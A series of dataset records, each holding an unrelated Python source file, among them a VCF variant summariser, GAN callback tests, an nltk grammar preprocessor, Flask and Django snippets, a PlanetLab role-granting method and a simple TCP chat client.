+{"seq_id":"353136011","text":"\"\"\"Array operations\n\"\"\"\n\n# Copyright (c) 2013 Clarinova. This file is licensed under the terms of the\n# Revised BSD License, included in this distribution as LICENSE.txt\n\nfrom numpy import *\nfrom ambry.geo import Point\n\ndef std_norm(a):\n \"\"\"Normalize to +-4 sigma on the range 0 to 1\"\"\"\n\n mean = a.mean()\n std = a.std()\n \n o = (( a - mean) / std).clip(-4,4) # Def of z-score\n o += 4\n o /= 8\n \n try:\n o.set_fill_value(0)\n except AttributeError:\n # If it isn't a masked array\n pass\n \n return o\n\n\ndef unity_norm(a):\n \"\"\"scale to the range 0 to 1\"\"\"\n\n range = a.max() - a.min()\n o = (a - a.min()) / range\n\n try:\n o.set_fill_value(0)\n except AttributeError:\n # If it isn't a masked array\n pass\n \n return o\n\ndef statistics(a):\n \n from numpy import sum as asum\n \n r = (\"Min, Max: {},{}\\n\".format(amin(a), amax(a)) +\n \"Range : {}\\n\".format(ptp(a)) +\n \"Average : {}\\n\".format(average(a))+\n \"Mean : {}\\n\".format(mean(a))+\n \"Median : {}\\n\".format(median(a))+\n \"StdDev : {}\\n\".format(std(a))+\n \"Sum : {}\\n\".format(asum(a))\n )\n \n try:\n # Try the method for masked arrays. The other method will not\n # respect the mask\n r += \"Histogram:{}\".format(histogram(a.compressed())[0].ravel().tolist())\n except:\n r += \"Histogram: {}\".format(histogram(a)[0].ravel().tolist())\n \n return r\n \ndef add(s,v,m):\n return v+(m*s)\n\n \ndef apply_copy(kernel, a, func=add, nodata=None, mult=True):\n \"\"\"For all cells in a, or all nonzero cells, apply the kernel\n to a new output array\n \"\"\"\n from itertools import izip\n \n o = zeros_like(a)\n \n #\n # Generate indices, \n if nodata == 0:\n indx = nonzero(a)\n z = izip(indx[0],indx[1])\n\n elif nodata is not None:\n indx = nonzero(a != nodata)\n z = izip(indx[0],indx[1])\n \n else:\n z = ndindex(a.shape)\n \n for row, col in z:\n kernel.apply(o,Point(col,row), func, a[row,col])\n \n return o\n\n \n \n","sub_path":"ambry/geo/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"52780910","text":"import json\nimport os\n \nmodulesFile = None\ninstalledPack = []\nnotInstalledPack = []\n\ndef readDepen(name, data):\n\tdependencies = data[name]\n\tnotInstalledPack.append(name)\n\tpacksList = []\n\n\tprint(\"installing \"+name) \n\n\tif((not dependencies)==False):\n\t\tdepMessage = \"In order to install \"+str(name)+\\\n\t\t\", we need\"\n\n\t\tfor elem in dependencies:\n\t\t\tif((elem in installedPack)==False):\n\t\t\t\tpacksList.append(elem)\n\n\n\t\tif packsList:\t\n\t\t\tfor elem in packsList:\n\t\t\t\tif(elem != packsList[0]):\n\t\t\t\t\tif(elem == packsList[-1]):\n\t\t\t\t\t\tdepMessage+=\" and\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tdepMessage+=\", \"\n\n\t\t\t\tdepMessage+=(\" \"+elem)\n\t \n\t\t\tprint(depMessage)\n \n\t\tfor elem in packsList:\n\t\t\treadDepen(elem, data)\n\n\ndef installedPackNames():\n\tnames=[]\n\n\tif os.path.isfile('installed_modules'):\n\t\twith open('installed_modules', encoding='utf-8') as f:\n\t\t\tlines = f.readlines()\n\t\t\tif(os.stat(\"installed_modules\").st_size > 0):\n\t\t\t\tlines.pop(0)\n\n\t\t\tfor elem in lines:\n\t\t\t\tnames.append((elem[4:].strip('\\n')))\n\t\t\tf.close()\n\telse:\n\t\tmodulesFile = open('installed_modules','a')\n\t\tmodulesFile.close()\n\n\treturn names\n \n \ndef parseJSON(fname):\n jsonFile = open(fname)\n data = json.loads(jsonFile.read())\n jsonFile.close()\n return data\n\ndef addInstalledPacks():\n\twith open('installed_modules',\"w+\", encoding='utf-8') as f:\n\t\tf.seek(0)\n\t\tf.truncate()\n\t\tall_packages = installedPack+notInstalledPack \n\n\t\tf.write(\"installed_modules/\\n\")\n\t\tfor elem in all_packages:\n\t\t\tline = \"\"\n\t\t\tif(elem == all_packages[-1]):\n\t\t\t\tline+=\"└── \"\n\t\t\telse:\n\t\t\t\tline+=\"├── \"\n\t\t\tline+=elem\n\t\t\tf.write(line+\"\\n\")\n\n\t\tf.close()\n \ndef main():\n\tpackages = parseJSON(\"all_packages.json\")\n\tdep = parseJSON(\"dependencies.json\")\n\n\tinstalledPack = installedPackNames()\n \n\tfor module in dep[\"dependencies\"]:\n\t\tif((module in installedPack)==False):\n\t\t\treadDepen(module, packages)\n\n\tif notInstalledPack:\n\t\taddInstalledPacks()\n\n\tprint(\"All done!\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"3-Dependencies-Resolving/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"83191087","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nanalyze_variants.py\n\nAnalyze the the variants in a vcf, the following will be printed:\n \n - How many variants found\n - How many mendelian violations\n - How many variants where not covered in all individuals. (Default depth 7)\n - How many variants did not satisfy the base call quality treshold. (Default 10)\n - How many variants followed each model:\n - AR_hom\n - AR_comp\n - AR_hom_dn\n - AR_comp_dn\n - AD\n - AD_dn\n - XD\n - XD_dn\n - XR\n - XR_dn\n - How many variants in genetic regions\n - How many rare variants (Default maf < 0.02)\n - How many high scored cadd. (Default cadd > 10)\n - How many rare + high score cadd\n - How many follow a genetic model + rare + high cadd\n\nCreated by Måns Magnusson on 2014-09-08.\nCopyright (c) 2014 __MoonsoInc__. All rights reserved.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport sys\nimport os\nimport click\n\nfrom codecs import open\nfrom datetime import datetime\nfrom pprint import pprint as pp\n\nimport pkg_resources\n\nfrom vcf_parser import parser as vcf_parser\n\nimport genmod\nfrom genmod import warning\n\n### This is for analyzing the variants ###\n\n@click.command()\n@click.argument('variant_file',\n nargs=1,\n type=click.Path(exists=True),\n metavar=' or \"-\"'\n)\n# @click.option('-c', '--config_file',\n# type=click.Path(exists=True),\n# help=\"\"\"Specify the path to a config file.\"\"\"\n# )\n@click.option('--frequency_treshold', '-freq',\n default=0.05,\n nargs=1,\n help='Specify the ferquency treshold for variants to be considered. Default 0.05'\n)\n@click.option('--cadd_treshold', '-cadd',\n default=10.0,\n nargs=1,\n help='Specify the cadd score treshold for variants to be considered. Default 10'\n)\n@click.option('--gq_treshold', '-gq',\n default=10.0,\n nargs=1,\n help='Specify the genotype quality treshold for variants to be considered. Default 10'\n)\n@click.option('--read_depth_treshold', '-depth',\n default=10.0,\n nargs=1,\n help='Specify the genotype quality treshold for variants to be considered. Default 10'\n)\n# @click.option('-p', '--patterns',\n# type=click.Choice(['AR', 'AD', 'X']),\n# multiple=True,\n# help='Specify the inheritance patterns. 
Default is all patterns'\n# )\n# @click.option('-o', '--outfile',\n# type=click.Path(exists=False),\n# help='Specify the path to a file where results should be stored.'\n# )\n# @click.option('-v', '--verbose',\n# is_flag=True,\n# help='Increase output verbosity.'\n# )\ndef summarize_variants(variant_file, frequency_treshold, cadd_treshold, gq_treshold, read_depth_treshold):\n \"\"\"Analyze the annotated variants in a VCF file.\"\"\" \n \n freq_keyword = '1000GMAF'\n inheritance_keyword = 'GeneticModels'\n \n inheritance_dict = {'AR_hom':0, 'AR_hom_dn': 0, 'AR_comp':0, 'AR_comp_dn': 0 , 'AD':0, 'AD_dn':0, \n 'XD':0, 'XD_dn':0, 'XR':0, 'XR_dn':0}\n number_of_variants = 0\n rare_variants = 0\n high_cadd_scores = 0\n no_cadd_score = 0\n high_cadd_and_rare = 0\n high_gq = 0\n covered_in_all = 0\n indels = 0\n indel_no_cadd = 0\n true_de_novos = 0\n \n analysis_start = datetime.now()\n \n if variant_file == '-':\n variant_parser = vcf_parser.VCFParser(fsock = sys.stdin)\n else:\n variant_parser = vcf_parser.VCFParser(infile = variant_file)\n \n for variant in variant_parser:\n models_found = variant['info_dict'].get(inheritance_keyword, None)\n maf = min([float(frequency) for frequency in variant['info_dict'].get(freq_keyword, '0').split(',')])\n cadd_score = max([float(cscore) for cscore in variant['info_dict'].get('CADD', '0').split(',')])\n reference = variant['REF']\n alternative = variant['ALT']\n\n number_of_variants += 1\n genotypes = variant.get('genotypes', {})\n \n correct_genotype = True\n adequate_depth = True\n \n for individual in genotypes:\n if genotypes[individual].genotype_quality < gq_treshold:\n correct_genotype = False\n \n #If any individual has depth below \"depth\" we do not consider the variant\n if genotypes[individual].quality_depth < read_depth_treshold:\n adequate_depth = False\n \n # Check what variant models that are followed:\n if models_found:\n for model in models_found.split(','):\n if '_dn' in model:\n if correct_genotype:\n true_de_novos += 1\n pp(variant)\n inheritance_dict[model] += 1\n \n # Check the frequency of the variants:\n \n if maf < frequency_treshold:\n rare_variants += 1\n if cadd_score > cadd_treshold:\n high_cadd_and_rare += 1\n \n # Check the cadd score:\n \n if cadd_score > cadd_treshold:\n high_cadd_scores += 1\n \n elif cadd_score == 0:\n no_cadd_score += 1\n \n # Check if indel:\n \n if len(reference) > 1 or len(alternative) > 1:\n indels += 1\n if cadd_score == 0:\n indel_no_cadd += 1\n\n pp(inheritance_dict) \n print('Number of variants: %s' % number_of_variants)\n print('Number of rare: %s. Frequency of all: %.2f' % (rare_variants, rare_variants/number_of_variants))\n print('Number of high cadd scores: %s. Frequency of all: %.2f' % (high_cadd_scores, high_cadd_scores/number_of_variants))\n print('Number of high cadd scores and rare: %s. Frequency of all: %.2f' \n % (high_cadd_and_rare, high_cadd_and_rare/number_of_variants))\n print('Number of no cadd scores: %s. Frequency of all: %.2f \\n' % (no_cadd_score, no_cadd_score/number_of_variants))\n print('Number of indels: %s. Frequency of all: %.2f' % (indels, indels/number_of_variants))\n print('Number of indels and no cadd score: %s. 
Frequency of all: %.2f \\n' \n % (indel_no_cadd, indel_no_cadd/number_of_variants))\n print('\"True\" de novos: %s \\n' % true_de_novos)\n print('Time for analysis: %s' % str(datetime.now()-analysis_start))\n\nif __name__ == '__main__':\n summarize_variants()","sub_path":"genmod/commands/summarize_variants.py","file_name":"summarize_variants.py","file_ext":"py","file_size_in_byte":6762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
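+A sketch of exercising the click command above in-process with click's own test runner; "annotated.vcf" is a placeholder for a genmod-annotated VCF, and the import path assumes the module lives at genmod/commands/summarize_variants.py as its sub_path states:
+
+from click.testing import CliRunner
+from genmod.commands.summarize_variants import summarize_variants
+
+runner = CliRunner()
+result = runner.invoke(summarize_variants, ['annotated.vcf', '-freq', '0.01'])
+print(result.output)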
+{"seq_id":"204517696","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 8 19:44:50 2020\r\n\r\n@author: Ela\r\n\"\"\"\r\n\r\nimport argparse\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #initialize argumentparser class for argparse\r\n \r\n parser = argparse.ArgumentParser()\r\n \r\n # add different arguments we need and ther types\r\n # we need fold\r\n \r\n parser.add_argument(\r\n \"--fold\",\r\n type=int\r\n )\r\n # read arguments from command line\r\n \r\n args = parser.parse_args()\r\n \r\n # run the fold specified by command line arguments\r\n \r\n run(fold=args.fold)","sub_path":"parse-train.py","file_name":"parse-train.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"604517994","text":"from PLC.Faults import *\nfrom PLC.Method import Method\nfrom PLC.Parameter import Parameter, Mixed\nfrom PLC.Persons import Person, Persons\nfrom PLC.Auth import Auth\nfrom PLC.Roles import Role, Roles\n\nclass AddRoleToPerson(Method):\n \"\"\"\n Grants the specified role to the person.\n\n PIs can only grant the tech and user roles to users and techs at\n their sites. Admins can grant any role to any user.\n\n Returns 1 if successful, faults otherwise.\n \"\"\"\n\n roles = ['admin', 'pi']\n\n accepts = [\n Auth(),\n Mixed(Role.fields['role_id'],\n Role.fields['name']),\n Mixed(Person.fields['person_id'],\n Person.fields['email']),\n ]\n\n returns = Parameter(int, '1 if successful')\n\n def call(self, auth, role_id_or_name, person_id_or_email):\n # Get role\n roles = Roles(self.api, [role_id_or_name])\n if not roles:\n raise PLCInvalidArgument(\"Invalid role '%s'\" % str(role_id_or_name))\n role = roles[0]\n\n # Get account information\n persons = Persons(self.api, [person_id_or_email])\n if not persons:\n raise PLCInvalidArgument(\"No such account\")\n person = persons[0]\n\n if person['peer_id'] is not None:\n raise PLCInvalidArgument(\"Not a local account\")\n\n # Authenticated function\n assert self.caller is not None\n\n # Check if we can update this account\n if not self.caller.can_update(person):\n raise PLCPermissionDenied(\"Not allowed to update specified account\")\n\n # Can only grant lesser (higher) roles to others\n if 'admin' not in self.caller['roles'] and \\\n role['role_id'] <= min(self.caller['role_ids']):\n raise PLCInvalidArgument(\"Not allowed to grant that role\")\n\n if role['role_id'] not in person['role_ids']:\n person.add_role(role)\n\n self.event_objects = {'Person': [person['person_id']],\n 'Role': [role['role_id']]}\n self.message = \"Role %d granted to person %d\" % \\\n (role['role_id'], person['person_id'])\n\n return 1\n","sub_path":"PLC/Methods/AddRoleToPerson.py","file_name":"AddRoleToPerson.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"380035781","text":"# TestScript.py\n# 8/5/19\n# Purpose: EV3 program code is written and run here!\n# To run: type \"python3 EV3ARScript.py\" on command line\n# NOTE: PROGRAM LOADS FOR ABOUT 30 SECONDS BEFORE RUNNING\n# NOTE: THIS SCRIPT USES MQTT\n\nfrom Commands import * # uses functions from EV3ARCommands.py\nimport globals # uses global variable\n\n\n################## WRITE YOUR CODE BELOW ###############\n\n# Write your code here!\ndef runEV3():\n while True:\n while getColor() != 'red':\n forward(.5,25)\n sleep(4)\n left(90)\n sleep(4)\n while getDist() > 7:\n forward(.5,25)\n sleep(4)\n right(180)\n forward(2,25)\n sleep(4)\n right(90)\n sleep(4)\n forward(3,25)\n sleep(4)\n right(180)\n sleep(4)\n\ndef runInLoop():\n while True:\n print(\"hello\")\n forward(2)\n sleep(1)\n\n\n ################### CODE BELOW RUNS PROGRAM; DON'T TOUCH #####################\n\n### This prepares some behind-the-scenes stuff ###\n\n# wrapper for runEV3 that initializes shared values in multiprocessing\ndef EV3Program(arr,runCode):\n globals.dirArray=arr # sets global array equal to multiprocessing array\n checkEV3(runCode) # check that all motors and sensors are connected\n runInLoop() # runs EV3 code\n runCode.value=False # switches boolean to turn off data upload\n\n\nif __name__=='__main__':\n run(EV3Program)\n\n\n","sub_path":"pythonScripts/Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"504855362","text":"import inspect\nimport os\nimport tempfile\n\nimport ganutil.callbacks as cbks\nimport numpy as np\nimport pytest\nfrom keras.layers import Activation, Dense, Flatten, Reshape\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\n\n@pytest.fixture()\ndef dirpath():\n tempdir = tempfile.TemporaryDirectory()\n print('Directory: %s' % tempdir.name)\n yield tempdir.name\n print('Directory clean upped.')\n tempdir.cleanup()\n\n\n@pytest.mark.callback\n@pytest.mark.parametrize(\"callback\", [\n cbks.GeneratedImage,\n cbks.ValueGraph,\n cbks.LossGraph,\n cbks.AccuracyGraph,\n cbks.ValueHistory,\n cbks.LossHistory,\n cbks.AccuracyHistory,\n cbks.GanProgbarLogger,\n cbks.GanModelCheckpoint\n])\ndef test_inheritance(callback):\n functions = ['on_batch_begin', 'on_batch_end', 'on_epoch_begin',\n 'on_epoch_end', 'on_train_begin', 'on_train_end',\n 'set_model', 'set_params']\n\n assert inspect.isclass(callback)\n\n members = inspect.getmembers(callback)\n for member in members:\n function = member[0]\n for i, f in enumerate(functions):\n if f == function:\n functions.pop(i)\n break\n assert len(functions) == 0\n\n\n@pytest.mark.callback\nclass TestGeneratedImage(object):\n \"\"\"ganutil.callbacks.GeneratedImageをテストするクラス.\"\"\"\n\n def test_property(self, dirpath):\n filepath = os.path.join(dirpath, '{epoch:02d}/images.png')\n\n samples = np.random.uniform(-1, -1, (25, 32))\n\n def normalize(images):\n return images * 127.5 + 127.5\n\n callback = cbks.GeneratedImage(filepath, samples, normalize)\n\n assert callback.filepath == filepath\n assert np.array_equal(callback.samples, samples)\n assert callback.normalize == normalize\n\n def test_callback(self, dirpath):\n filepath = os.path.join(dirpath, '{epoch:02d}/images.png')\n\n generator = Sequential()\n generator.add(Dense(16, input_shape=(32,)))\n generator.add(Activation('tanh'))\n generator.add(Reshape((4, 4, 1)))\n\n discriminator = Sequential()\n discriminator.add(Flatten(input_shape=(4, 4, 1)))\n discriminator.add(Dense(1))\n discriminator.add(Activation('sigmoid'))\n\n gan = Sequential((generator, discriminator))\n gan.compile(Adam(), 'binary_crossentropy')\n\n samples = np.random.uniform(-1, -1, (25, 32))\n\n def normalize(images):\n return images * 127.5 + 127.5\n\n callback = cbks.GeneratedImage(filepath, samples, normalize)\n\n callback.set_model(gan)\n\n for i in range(10):\n callback.on_epoch_end(i, logs={})\n assert os.path.isfile(filepath.format(epoch=i))\n\n\n@pytest.mark.callback\n@pytest.mark.parametrize(\"filepath, sample_mode, epoch_mode\", [\n ('{epoch:02d}/graph.png', 'epoch', True),\n ('{batch:02d}/graph.png', 'batch', False),\n])\ndef test_valuegraph(dirpath, filepath, sample_mode, epoch_mode):\n epoch_logs = {'value': 10}\n batch_logs = {'size': 10, 'value': 1}\n name = 'value'\n\n filepath = os.path.join(dirpath, filepath)\n\n callback = cbks.ValueGraph(filepath, name, sample_mode=sample_mode)\n assert callback.filepath == filepath\n assert callback.name == name\n assert callback.epoch_mode == epoch_mode\n\n callback.on_train_begin()\n assert callback.values == []\n assert callback.epoch_values == []\n\n for i in range(10):\n callback.on_epoch_begin(i, epoch_logs)\n for j in range(10):\n callback.on_batch_begin(j, batch_logs)\n callback.on_batch_end(j, batch_logs)\n assert os.path.isfile(filepath.format(\n epoch=i, batch=j)) != epoch_mode\n callback.on_epoch_end(i, epoch_logs)\n assert os.path.isfile(filepath.format(epoch=i, batch=-1)) == epoch_mode\n callback.on_train_end()\n 
assert callback.values == [1 for _ in range(10 * 10)]\n assert callback.epoch_values == [10 for _ in range(10)]\n\n\n@pytest.mark.callback\n@pytest.mark.parametrize(\"filepath, sample_mode, epoch_mode\", [\n ('{epoch:02d}/array.npy', 'epoch', True),\n ('{batch:02d}/array.npy', 'batch', False),\n])\ndef test_valuehistory(dirpath, filepath, sample_mode, epoch_mode):\n epoch_logs = {'value': 10}\n batch_logs = {'size': 10, 'value': 1}\n name = 'value'\n\n filepath = os.path.join(dirpath, filepath)\n\n callback = cbks.ValueHistory(filepath, name, sample_mode=sample_mode)\n assert callback.filepath == filepath\n assert callback.name == name\n assert callback.epoch_mode == epoch_mode\n\n callback.on_train_begin()\n assert callback.values == []\n assert callback.epoch_values == []\n\n for i in range(10):\n callback.on_epoch_begin(i, epoch_logs)\n for j in range(10):\n callback.on_batch_begin(j, batch_logs)\n callback.on_batch_end(j, batch_logs)\n assert os.path.isfile(filepath.format(\n epoch=i, batch=j)) != epoch_mode\n callback.on_epoch_end(i, epoch_logs)\n assert os.path.isfile(filepath.format(epoch=i, batch=-1)) == epoch_mode\n callback.on_train_end()\n assert callback.values == [1 for _ in range(10 * 10)]\n assert callback.epoch_values == [10 for _ in range(10)]\n\n@pytest.mark.callback\n@pytest.mark.parametrize('epochs, steps', [\n (1, 10),\n (2, 10),\n (30, 50),\n])\ndef test_progbar(epochs, steps):\n progbar = cbks.GanProgbarLogger()\n progbar.params = {\n 'epochs': epochs,\n 'steps': steps,\n 'metrics': {\n 'discriminator': ['loss'],\n 'generator': ['loss']\n }\n }\n progbar.on_train_begin()\n for epoch in range(epochs):\n progbar.on_epoch_begin(epoch)\n for step in range(steps):\n logs = {\n 'discriminator': {\n 'loss': step,\n },\n 'generator': {\n 'loss': step,\n }\n }\n progbar.on_batch_begin(step, logs)\n progbar.on_batch_end(step, logs)\n logs = {\n 'discriminator': {\n 'loss': epoch,\n },\n 'generator': {\n 'loss': epoch,\n }\n }\n progbar.on_epoch_end(epoch, logs)\n\n progbar.on_train_end()\n","sub_path":"test/test_callbacks.py","file_name":"test_callbacks.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"349418209","text":"import numpy as np\nfrom nltk import Tree\nfrom nltk.grammar import Production, Nonterminal, ProbabilisticProduction\n\n\n\n\ndef load_datas(file_path):\n cfg = open(file_path)\n sentences = []\n # Store each line of the data:\n for line in cfg.readlines():\n line = line.replace('\\n', '').split(' ')\n L = []\n for seq in line:\n if seq[0] == '(' and '-' in seq:\n L.append(seq.split('-')[0])\n else:\n L.append(seq)\n sentences.append(''.join(str(s) + ' ' for s in L)[:-1])\n return sentences\n\n\n\ndef generate_set(sentences, p=0.8):\n # Reshuffle the sentences\n np.random.shuffle(sentences)\n l = len(sentences)\n # Define the differents sets\n x_train = sentences[:int(p * l)]\n x_val = sentences[int(p * l): -int((1-p)/2 * l)]\n x_test = sentences[-int((1-p)/2 * l):]\n return x_train, x_val, x_test\n\n\n\n\ndef get_grammar(sentences):\n gram, prods = {}, []\n for sent in sentences:\n processing = process_sent(sent)\n processing.create_Tree(sent)\n for prod in processing.Tree_prod:\n processing.prod = prod\n processing.modify_tree()\n prods.append(processing.prod)\n r, l = processing.rhs, processing.lhs\n if str(r) not in gram:\n gram[str(r)] = []\n if str(l) not in gram[str(r)]:\n gram[str(r)].append(str(l))\n return gram, prods\n\n\n\n\nclass process_sent():\n \n def __init__(self, sent, save_prods=[], save_unary=[], Words_set=[]):\n self.save_prods = save_prods\n self.save_unary = save_unary\n # Words_set contient tous les tokens rencontrés\n self.Words_set = Words_set\n \n \n def create_Tree(self, sent):\n tree = Tree.fromstring(sent)\n tree.chomsky_normal_form()\n self.Tree_prod = tree.productions()\n \n \n def modify_tree(self):\n ''' Delete the end of the part of speech '''\n lhs = self.prod.lhs()\n self.lhs = Nonterminal(lhs.symbol().split(\"|\")[0])\n self.rhs = self.prod.rhs()\n if len(self.rhs) > 1:\n self.rhs = [Nonterminal(r.symbol().split(\"|\")[0]) for r in self.rhs]\n self.prod = Production(self.lhs, self.rhs)\n \n \n def transform_terminals(self):\n ''' This function replaces the terminal tokens by the POS tag and store the tokens '''\n if isinstance(self.rhs[0], str):\n self.prod = Production(self.lhs, [str(self.lhs)])\n # we store the tokens\n self.Words_set.append(self.rhs[0])\n\n \n def save_unitary_rule(self):\n ''' We save elements we want to modify '''\n if len(self.rhs)==1 and isinstance(self.rhs[0], str)==False:\n self.save_unary.append(self.prod)\n \n \n def modify_unitary_rules(self):\n self.dict, possible_rules, unary = {}, list(set(self.save_prods)), list(set(self.save_unary))\n for rule in unary:\n spe_rules = [r for r in possible_rules if (len(r.rhs()) > 1 and r.lhs() == rule.rhs()[0])]\n self.dict[rule] = [Production(rule.lhs(), r.rhs()) for r in spe_rules]\n \n \n def delete_prods(self):\n ''' Replaces unitary rules where rhs is a non terminal symbol '''\n self.modify_unitary_rules()\n prods_modify, unary = [], list(set(self.save_unary))\n for prod in self.save_prods:\n if prod in unary:\n prods_modify += self.dict[prod]\n else:\n prods_modify.append(prod)\n return prods_modify\n \n \n def process(self, sent):\n ''' We pre-process a sentence with the previous functions '''\n self.create_Tree(sent)\n for prod in self.Tree_prod:\n self.prod = prod\n self.modify_tree()\n self.transform_terminals()\n self.save_prods.append(self.prod)\n self.save_unitary_rule()\n return self.save_prods, self.save_unary, 
self.Words_set","sub_path":"TD2/load_transform_data.py","file_name":"load_transform_data.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"469661892","text":"from django import forms\nfrom clinicmodels.models import Patient\n\n\nclass PatientForm(forms.ModelForm):\n class Meta:\n model = Patient\n fields = ['village_prefix', 'name', 'local_name',\n 'contact_no', 'gender', 'travelling_time_to_village',\n 'date_of_birth', 'drug_allergy', 'parent', 'face_encodings', 'picture']\n\n","sub_path":"patient/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"228356793","text":"from flask import jsonify, make_response, g\nfrom marshmallow import ValidationError\n\nfrom app import app\nfrom app.decorators import auth_login_required, login_required\nfrom .services import ProfileService\nfrom .schemas import ProfileSchema, CreateProfileSchema\n\nNAMESPACE = '/profile'\n\n\n@app.route(NAMESPACE + '/create', methods=['GET'])\n@auth_login_required\ndef route_create_profile():\n data = g.create_profile_data\n\n service = ProfileService\n try:\n loaded_data = CreateProfileSchema(unknown=True).load(data)\n except ValidationError as error:\n return make_response(jsonify(errors=error.messages), 500)\n else:\n new_profile = service.create(loaded_data)\n return make_response(\n jsonify(data=ProfileSchema().dump(new_profile)),\n 200\n )\n\n\n@app.route(NAMESPACE + '/get', methods=['GET'])\n@login_required\ndef route_get_profile():\n return make_response(\n jsonify(data=ProfileSchema().dump(g.profile)),\n 200\n )\n","sub_path":"app/profile/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187590416","text":"# TCPMessageClient.py\n\nimport socket\nimport select\nimport string\nimport time\nimport sys\n\ndef prompt():\n sys.stdout.write('Message -> ')\n sys.stdout.flush()\n\n#main function\nif __name__ == \"__main__\":\n\n if(len(sys.argv) < 3) :\n print('Usage : python3 TCPMessageClient.py hostname port')\n sys.exit()\n\n host = sys.argv[1]\n port = int(sys.argv[2])\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n\n # connect to remote host\n try :\n s.connect((host, port))\n except :\n print('Connection failed. Please check your values and run the script again.')\n sys.exit()\n\n print('Connection to server established successfully.')\n prompt()\n\n while 1:\n socket_list = [sys.stdin, s]\n\n # Get the list sockets which are readable\n read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])\n\n for sock in read_sockets:\n #incoming message from remote server\n if sock == s:\n data = sock.recv(1024)\n data = data.decode('UTF-8')\n if not data :\n print('\\nDisconnected from the server.')\n sys.exit()\n else :\n #print data\n sys.stdout.write(data)\n prompt()\n\n #user entered a message\n else :\n msg = sys.stdin.readline()\n msg = msg.encode()\n s.send(msg)\n prompt()\n","sub_path":"GCSE/TCPMessageClient.py","file_name":"TCPMessageClient.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"610417889","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n# Copyright 2015 The Chromium OS Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Authoritative source for Chromium OS region/locale configuration.\n\nRun this module to display all known regions (use --help to see options).\n\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport collections\nimport json\nimport re\nimport sys\n\nimport yaml\n\n\n# The regular expression to check values in Region.keyboards and Region.locales.\n# Keyboards should come with xkb: protocol, or the input methods (ime:, m17n:).\n# Examples: xkb:us:intl:eng, ime:ime:zh-t:cangjie, xkb:us:altgr-intl:eng\nKEYBOARD_PATTERN = re.compile(r'^xkb:\\w+:[\\w-]*:\\w+$|'\n r'^(ime|m17n|t13n):[\\w:-]+$')\n# Locale should be a combination of language and location.\n# Examples: en-US, ja.\nLOCALE_PATTERN = re.compile(r'^(\\w+)(-[A-Z0-9]+)?$')\n\n\nclass Enum(frozenset):\n \"\"\"An enumeration type.\n\n Usage:\n To create a enum object:\n dummy_enum = Enum(['A', 'B', 'C'])\n\n To access a enum object, use:\n dummy_enum.A\n dummy_enum.B\n \"\"\"\n\n def __getattr__(self, name):\n if name in self:\n return name\n raise AttributeError\n\n\nclass RegionException(Exception):\n \"\"\"Exception in Region handling.\"\"\"\n pass\n\n\ndef MakeList(value):\n \"\"\"Converts the given value to a list.\n\n Returns:\n A list of elements from \"value\" if it is iterable (except string);\n otherwise, a list contains only one element.\n \"\"\"\n if (isinstance(value, collections.Iterable) and\n not isinstance(value, basestring)):\n return list(value)\n return [value]\n\n\nclass Region(object):\n \"\"\"Comprehensive, standard locale configuration per country/region.\n\n See :ref:`regions-values` for detailed information on how to set these values.\n \"\"\"\n # pylint gets confused by some of the docstrings.\n # pylint: disable=C0322\n\n # ANSI = US-like\n # ISO = UK-like\n # JIS = Japanese\n # KS = Korean (see http://crosbug.com/p/50753 for why this is not used yet)\n # ABNT2 = Brazilian (like ISO but with an extra key to the left of the\n # right shift key)\n KeyboardMechanicalLayout = Enum(['ANSI', 'ISO', 'JIS', 'KS', 'ABNT2'])\n\n region_code = None\n \"\"\"A unique identifier for the region. This may be a lower-case\n `ISO 3166-1 alpha-2 code\n `_ (e.g., ``us``),\n a variant within an alpha-2 entity (e.g., ``ca.fr``), or an\n identifier for a collection of countries or entities (e.g.,\n ``latam-es-419`` or ``nordic``). See :ref:`region-codes`.\n\n Note that ``uk`` is not a valid identifier; ``gb`` is used as it is\n the real alpha-2 code for the UK.\"\"\"\n\n keyboards = None\n \"\"\"A list of keyboard layout identifiers (e.g., ``xkb:us:intl:eng``\n or ``m17n:ar``). This field was designed to be the physical keyboard layout\n in the beginning, and then becomes a list of OOBE keyboard selection, which\n then includes non-physical layout elements like input methods (``ime:``).\n To avoid confusion, physical layout is now defined by\n 